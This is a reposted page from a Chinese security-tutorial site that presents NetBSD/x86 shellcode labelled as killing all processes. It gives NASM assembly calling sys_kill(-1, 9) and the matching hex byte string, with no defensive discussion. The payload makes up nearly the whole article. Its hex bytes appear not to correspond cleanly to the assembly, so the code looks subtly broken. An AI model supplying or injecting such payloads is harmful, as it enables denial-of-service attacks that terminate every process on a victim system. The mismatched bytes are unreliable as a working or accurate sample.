当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 杀掉进程的shellcode(netbsd/x86)

杀毒防毒
暴力测试:谁家杀毒软件可防QQ密码被盗
教你手工剿灭QQ广告弹出木马
当心!HTML文件也能格式化硬盘
用QQ文件共享漏洞入侵Win2003系统
查找与清除插入式特络伊木马
徒手实战“敲诈者”病毒实例
安全防范:网站暗藏木马能奈之我何?
彻底杀毒 提高KV2006的杀查“智商”
Active Virus Shield:以“卡巴斯基”之名杀毒
HijackThis日志纵览
HijackThis日志细解正文(二):组别—R
HijackThis日志细解正文(三):组别—F
HijackThis日志细解正文(四):组别—N
HijackThis日志细解正文(五):组别—O1
HijackThis日志细解正文(六):组别—O2
HijackThis日志细解正文(七):组别—O3
HijackThis日志细解正文(八):组别—O4
HijackThis日志细解正文(九):组别—O5
HijackThis日志细解正文(十):组别—O6
HijackThis日志细解正文(十一):组别—O7

杀毒防毒 中的 杀掉进程的shellcode(netbsd/x86)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 58 ::
收藏到网摘: n/a

  /*

  netbsd/x86 kill all processes shellcode

  author Teo Manojlovic

  contact [email protected]

  this shellcode is using syscall number 37 or 0x25

  37 STD { int sys_kill(int pid, int signum); }

  here is assembler code using intel syntaxe and NASM

  --------------begin-----------

  section .note.netbsd.ident

  dd0x07,0x04,0x01

  db"NetBSD",0x00,0x00

  dd200000000

  section .data

  section .text

  global _start

  _start:

  xor eax, eax

  push 0x09

  mov eax, -1

  push eax

  xor eax,eax

  mov al, 37

  push eax

  int 0x80

  -------------------------end------------

  if we dissasemble this code wi will get shellcode

  "\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"

  */